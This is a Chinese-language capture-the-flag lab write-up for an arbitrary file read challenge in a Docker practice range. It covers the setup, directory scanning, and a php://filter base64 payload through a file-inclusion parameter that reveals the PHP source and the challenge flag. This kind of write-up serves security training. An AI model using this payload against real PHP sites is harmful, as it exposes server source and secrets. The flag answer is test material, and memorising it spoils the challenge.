1.1漏洞描述
漏洞名称 | 任意文件读取漏洞 afr_1 |
漏洞类型 | 文件读取 |
漏洞等级 | ⭐ |
漏洞环境 | docker |
攻击方式 |
1.2漏洞等级
高危
1.3影响版本
暂无
1.4漏洞复现
1.4.1.基础环境
靶场 | docker |
工具 | BurpSuite |
1.4.2.靶场搭建
1.创建docker-compose.yml文件
version: '3.2'
services:
web:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
ports:
- 80:80
2.将该代码写入文件
启动方式
docker-compose up -d
flag
n1book{afr_1_solved}
关闭
sudo docker-compose down
3.访问kali 80端口
搭建成功
1.5深度利用
1.5.1漏洞点
- 1.dirsearch目录扫描
dirsearch --url http://10.9.47.79
- 2.查看 /flag.php
- 3.查看/index.php
- 发现跳转到 ?p=hello
所以可能是/index.html包含了?p=hello
文件包含
- 4.使用php://fileter 读取(读取php源码)
?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]
- 它读取到的结果是base64加密的
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
- 5.进行base64解码
- 6.成功拿到flag
n1book{afr_1_solved}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备